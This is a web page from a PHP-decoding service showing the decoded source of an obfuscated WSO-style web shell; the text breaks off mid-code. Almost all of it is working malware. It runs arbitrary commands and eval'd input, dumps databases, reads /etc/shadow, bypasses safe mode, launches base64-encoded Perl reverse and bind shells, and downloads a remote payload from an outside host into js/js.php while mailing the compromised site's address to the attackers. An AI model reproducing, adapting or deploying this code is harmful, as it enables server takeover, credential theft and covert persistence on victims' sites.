Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto Dam_K; DVeSk: function actionRC() { if (!@$_POST["\x70\61"]) { $a = array("\x7..
Decoded Output download
<?php
goto Dam_K; DVeSk: function actionRC() { if (!@$_POST["p1"]) { $a = array("uname" => php_uname(), "php_version" => phpversion(), "wso_version" => WSO_VERSION, "safemode" => @ini_get("safe_mode")); echo serialize($a); } else { eval($_POST["p1"]); } } goto hFBmU; lpEk_: function wsoEx($in) { $out = ''; if (function_exists("exec")) { @exec($in, $out); $out = @join("
", $out); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists("shell_exec")) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $out = ''; while (!@feof($f)) { $out .= fread($f, 1024); } pclose($f); } return $out; } goto uRnpW; nHI7I: function wsoPerms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto h18YW; xBzDj: function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '" . addslashes($str) . "';select file from wso2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table wso2"); return array("file" => implode("
", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . ";
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $head = true; while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { if ($v == null) { $item[$k] = "NULL"; } elseif (is_numeric($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql = "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES
(" . implode(", ", $item) . ")"; $head = false; } else { $sql = "
,(" . implode(", ", $item) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } if (!$head) { if ($fp) { fwrite($fp, ";
"); } else { echo ";
\xa"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($item = $this->fetch()) { $columns = array(); foreach ($item as $k => $v) { $item[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $item) . ");" . "\xa"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } wsoHeader(); echo "\xa
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\xa<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>
<td><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></td>\xa<td><input type=text name=sql_host value='" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . "'></td>
<td><input type=text name=sql_login value='" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . "'></td>
<td><input type=text name=sql_pass value='" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "'></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while ($item = $db->fetch()) { list($key, $value) = each($item); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td>
<td><input type=submit value='>>' onclick='fs(d.sf);'></td>
<td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>
</tr>
</table>
<script>\xa s_db='" . @addslashes($_POST["sql_base"]) . "';
function fs(f) {
if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa if(f.p1) f.p1.value='';\xa if(f.p2) f.p2.value='';
if(f.p3) f.p3.value='';
}
}
function st(t,l) {\xa d.sf.p1.value = 'select';
d.sf.p2.value = t;
if(l && d.sf.p3) d.sf.p3.value = l;
d.sf.submit();\xa }\xa function is() {\xa for(i=0;i<d.sf.elements['tbl[]'].length;++i)
d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa }
</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? " " : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>< Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next ></a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">"; $line = 1; while ($item = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($item as $key => $value) { echo "<th>" . $key . "</th>"; } reset($item); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($item as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; wsoFooter(); } goto o85Ey; o85Ey: function actionNetwork() { wsoHeader(); $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content>\xa
<form name='nfp' onSubmit="g(null,null,'bpp',this.port.value);return false;">\xa <span>Bind port to /bin/sh [perl]</span><br/>\xa Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\xa </form>\xa <form name='nfp' onSubmit="g(null,null,'bcp',this.server.value,this.port.value);return false;">\xa <span>Back-connect [perl]</span><br/>\xa Server: <input type='text' name='server' value='" . $_SERVER["REMOTE_ADDR"] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>
\xa </form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpp") { cf("/tmp/bp.pl", $bind_port_p); $out = wsoEx("perl /tmp/bp.pl " . $_POST["p2"] . " 1>/dev/null 2>&1 &"); echo "<pre class=ml1>{$out}\xa" . wsoEx("ps aux | grep bp.pl") . "</pre>"; unlink("/tmp/bp.pl"); } if ($_POST["p1"] == "bcp") { cf("/tmp/bc.pl", $back_connect_p); $out = wsoEx("perl /tmp/bc.pl " . $_POST["p2"] . " " . $_POST["p3"] . " 1>/dev/null 2>&1 &"); echo "<pre class=ml1>{$out}
" . wsoEx("ps aux | grep bc.pl") . "</pre>"; unlink("/tmp/bc.pl"); } } echo "</div>"; wsoFooter(); } goto DVeSk; w3bFN: if (!isset($_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_SESSION[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $GLOBALS["default_use_ajax"]; } goto dbSML; UH3qI: function actionSecInfo() { wsoHeader(); echo "<h1>Server security information</h1><div class=content>"; function wsoSecParam($n, $v) { $v = trim($v); if ($v) { echo "<span>" . $n . ": </span>"; if (strpos($v, "
") === false) { echo $v . "<br>"; } else { echo "<pre class=ml1>" . $v . "</pre>"; } } } wsoSecParam("Server software", @getenv("SERVER_SOFTWARE")); if (function_exists("apache_get_modules")) { wsoSecParam("Loaded Apache modules", implode(", ", apache_get_modules())); } wsoSecParam("Disabled PHP Functions", $GLOBALS["disable_functions"] ? $GLOBALS["disable_functions"] : "none"); wsoSecParam("Open base dir", @ini_get("open_basedir")); wsoSecParam("Safe mode exec dir", @ini_get("safe_mode_exec_dir")); wsoSecParam("Safe mode include dir", @ini_get("safe_mode_include_dir")); wsoSecParam("cURL support", function_exists("curl_version") ? "enabled" : "no"); $temp = array(); if (function_exists("mysql_get_client_info")) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if (function_exists("mssql_connect")) { $temp[] = "MSSQL"; } if (function_exists("pg_connect")) { $temp[] = "PostgreSQL"; } if (function_exists("oci_connect")) { $temp[] = "Oracle"; } wsoSecParam("Supported databases", implode(", ", $temp)); echo "<br>"; if ($GLOBALS["os"] == "nix") { wsoSecParam("Readable /etc/passwd", @is_readable("/etc/passwd") ? "yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a>" : "no"); wsoSecParam("Readable /etc/shadow", @is_readable("/etc/shadow") ? "yes <a href='#' onclick='g("FilesTools", "etc", "shadow")'>[view]</a>" : "no"); wsoSecParam("OS version", @file_get_contents("/proc/version")); wsoSecParam("Distr name", @file_get_contents("/etc/issue.net")); if (!$GLOBALS["safe_mode"]) { $userful = array("gcc", "lcc", "cc", "ld", "make", "php", "perl", "python", "ruby", "tar", "gzip", "bzip", "bzip2", "nc", "locate", "suidperl"); $danger = array("kav", "nod32", "bdcored", "uvscan", "sav", "drwebd", "clamd", "rkhunter", "chkrootkit", "iptables", "ipfw", "tripwire", "shieldcc", "portsentry", "snort", "ossec", "lidsadm", "tcplodg", "sxid", "logcheck", "logwatch", "sysmask", "zmbscap", "sawmill", "wormscan", "ninja"); $downloaders = array("wget", "fetch", "lynx", "links", "curl", "get", "lwp-mirror"); echo "<br>"; $temp = array(); foreach ($userful as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("Userful", implode(", ", $temp)); $temp = array(); foreach ($danger as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("Danger", implode(", ", $temp)); $temp = array(); foreach ($downloaders as $item) { if (wsoWhich($item)) { $temp[] = $item; } } wsoSecParam("Downloaders", implode(", ", $temp)); echo "<br/>"; wsoSecParam("HDD space", wsoEx("df -h")); wsoSecParam("Hosts", @file_get_contents("/etc/hosts")); } } else { wsoSecParam("OS Version", wsoEx("ver")); wsoSecParam("Account Settings", wsoEx("net accounts")); wsoSecParam("User Accounts", wsoEx("net user")); } echo "</div>"; wsoFooter(); } goto MG4ce; paXBG: $linkcr = "Link: " . $_SERVER["SERVER_NAME"] . '' . $_SERVER["REQUEST_URI"] . " - IP Excuting: {$ip_remote} - Time: {$time_shell}"; goto abKjx; IHC8D: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\x0" . preg_replace("!\(\d+\)\s.*!", '', __FILE__)); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "\xa"; } } break; } $temp = ob_get_clean(); wsoHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . htmlspecialchars($temp) . "</pre>"; } echo "</div>"; wsoFooter(); } goto Cm9cN; tLnwE: if (!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto fvOgj; LZD1D: $server_mail = '' . gethostbyname($_SERVER["SERVER_NAME"]) . " - " . $_SERVER["HTTP_HOST"] . ''; goto paXBG; WSK9t: if ($datasi) { } else { @mkdir("js"); $dos = file_get_contents("https://acbdf.space/txt/css.txt"); $data = "js/js.php"; @touch("js/js.php"); $ver = @fopen($data, "w"); @fwrite($ver, $dos); @fclose($ver); $yol = "http://" . $_SERVER["HTTP_HOST"] . '' . $_SERVER["REQUEST_URI"] . ''; $y = "<h1>Sender Yazdirildi.<br/> SITE YOL : " . $yol . "<br/>Sender Yolu : js/crs.php</h1>"; $header .= "From: SheLL Boot <[email protected]>\xa"; $header .= "Content-Type: text/html;
charset=utf-8\xa"; @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); @mail("[email protected]", "Hacklink Bildiri", "{$y}", $header); } goto iAJkS; A6iUw: if (get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map("WSOstripslashes", $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); } goto v_sDF; POwAE: if ($os == "win") { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } goto CpMIl; abKjx: $header = "From: {$from_shellcode}\xd\xaReply-to: {$from_shellcode}"; goto VYjv_; Q9S2h: function actionFilesMan() { wsoHeader(); echo "<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>"; if (!empty($_POST["p1"])) { switch ($_POST["p1"]) { case "uploadFile": if (!@move_uploaded_file($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) { echo "Can't upload file!"; } break; case "mkdir": if (!@mkdir($_POST["p2"])) { echo "Can't create new dir"; } break; case "delete": function deleteDir($path) { $path = substr($path, -1) == "/" ? $path : $path . "/"; $dh = opendir($path); while (($item = readdir($dh)) !== false) { $item = $path . $item; if (basename($item) == ".." || basename($item) == ".") { continue; } $type = filetype($item); if ($type == "dir") { deleteDir($item); } else { @unlink($item); } } closedir($dh); @rmdir($path); } if (is_array(@$_POST["f"])) { foreach ($_POST["f"] as $f) { if ($f == "..") { continue; } $f = urldecode($f); if (is_dir($f)) { deleteDir($f); } else { @unlink($f); } } } break; case "paste": if ($_SESSION["act"] == "copy") { function copy_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["f"] as $f) { copy_paste($_SESSION["c"], $f, $GLOBALS["cwd"]); } } elseif ($_SESSION["act"] == "move") { function move_paste($c, $s, $d) { if (is_dir($c . $s)) { mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (@is_file($c . $s)) { @copy($c . $s, $d . $s); } } foreach ($_SESSION["f"] as $f) { @rename($_SESSION["c"] . $f, $GLOBALS["cwd"] . $f); } } elseif ($_SESSION["act"] == "zip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); if ($zip->open($_POST["p2"], 1)) { chdir($_SESSION["c"]); foreach ($_SESSION["f"] as $f) { if ($f == "..") { continue; } if (@is_file($_SESSION["c"] . $f)) { $zip->addFile($_SESSION["c"] . $f, $f); } elseif (@is_dir($_SESSION["c"] . $f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f . "/")); foreach ($iterator as $key => $value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS["cwd"]); $zip->close(); } } } elseif ($_SESSION["act"] == "unzip") { if (class_exists("ZipArchive")) { $zip = new ZipArchive(); foreach ($_SESSION["f"] as $f) { if ($zip->open($_SESSION["c"] . $f)) { $zip->extractTo($GLOBALS["cwd"]); $zip->close(); } } } } elseif ($_SESSION["act"] == "tar") { chdir($_SESSION["c"]); $_SESSION["f"] = array_map("escapeshellarg", $_SESSION["f"]); wsoEx("tar cfzv " . escapeshellarg($_POST["p2"]) . " " . implode(" ", $_SESSION["f"])); chdir($GLOBALS["cwd"]); } unset($_SESSION["f"]); break; default: if (!empty($_POST["p1"])) { $_SESSION["act"] = @$_POST["p1"]; $_SESSION["f"] = @$_POST["f"]; foreach ($_SESSION["f"] as $k => $f) { $_SESSION["f"][$k] = urldecode($f); } $_SESSION["c"] = @$_POST["c"]; } break; } } $dirContent = @scandir(isset($_POST["c"]) ? $_POST["c"] : $GLOBALS["cwd"]); if ($dirContent === false) { echo "Can't open this folder!"; wsoFooter(); return; } global $sort; $sort = array("name", 1); if (!empty($_POST["p1"])) { if (preg_match("!s_([A-z]+)_(\d{1})!", $_POST["p1"], $match)) { $sort = array($match[1], (int) $match[2]); } } echo "<script>\xa function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
\xa</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g("FilesMan",null,"s_name_" . ($sort[1] ? 0 : 1) . "")'>Name</a></th><th><a href='#' onclick='g("FilesMan",null,"s_size_" . ($sort[1] ? 0 : 1) . "")'>Size</a></th><th><a href='#' onclick='g("FilesMan",null,"s_modify_" . ($sort[1] ? 0 : 1) . "")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g("FilesMan",null,"s_perms_" . ($sort[1] ? 0 : 1) . "")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for ($i = 0; $i < $n; $i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array("name" => $dirContent[$i], "path" => $GLOBALS["cwd"] . $dirContent[$i], "modify" => date("Y-m-d H:i:s", @filemtime($GLOBALS["cwd"] . $dirContent[$i])), "perms" => wsoPermsColor($GLOBALS["cwd"] . $dirContent[$i]), "size" => @filesize($GLOBALS["cwd"] . $dirContent[$i]), "owner" => $ow["name"] ? $ow["name"] : @fileowner($dirContent[$i]), "group" => $gr["name"] ? $gr["name"] : @filegroup($dirContent[$i])); if (@is_file($GLOBALS["cwd"] . $dirContent[$i])) { $files[] = array_merge($tmp, array("type" => "file")); } elseif (@is_link($GLOBALS["cwd"] . $dirContent[$i])) { $dirs[] = array_merge($tmp, array("type" => "link", "link" => readlink($tmp["path"]))); } elseif (@is_dir($GLOBALS["cwd"] . $dirContent[$i]) && $dirContent[$i] != ".") { $dirs[] = array_merge($tmp, array("type" => "dir")); } } $GLOBALS["sort"] = $sort; function wsoCmp($a, $b) { if ($GLOBALS["sort"][0] != "size") { return strcmp(strtolower($a[$GLOBALS["sort"][0]]), strtolower($b[$GLOBALS["sort"][0]])) * ($GLOBALS["sort"][1] ? 1 : -1); } else { return ($a["size"] < $b["size"] ? -1 : 1) * ($GLOBALS["sort"][1] ? 1 : -1); } } usort($files, "wsoCmp"); usort($dirs, "wsoCmp"); $files = array_merge($dirs, $files); $l = 0; foreach ($files as $f) { echo "<tr" . ($l ? " class=l1" : '') . "><td><input type=checkbox name="f[]" value="" . urlencode($f["name"]) . "" class=chkbx></td><td><a href=# onclick="" . ($f["type"] == "file" ? "g('FilesTools',null,'" . urlencode($f["name"]) . "', 'view')">" . htmlspecialchars($f["name"]) : "g('FilesMan','" . $f["path"] . "');" title=" . $f["link"] . "><b>[ " . htmlspecialchars($f["name"]) . " ]</b>") . "</a></td><td>" . ($f["type"] == "file" ? wsoViewSize($f["size"]) : $f["type"]) . "</td><td>" . $f["modify"] . "</td><td>" . $f["owner"] . "/" . $f["group"] . "</td><td><a href=# onclick="g('FilesTools',null,'" . 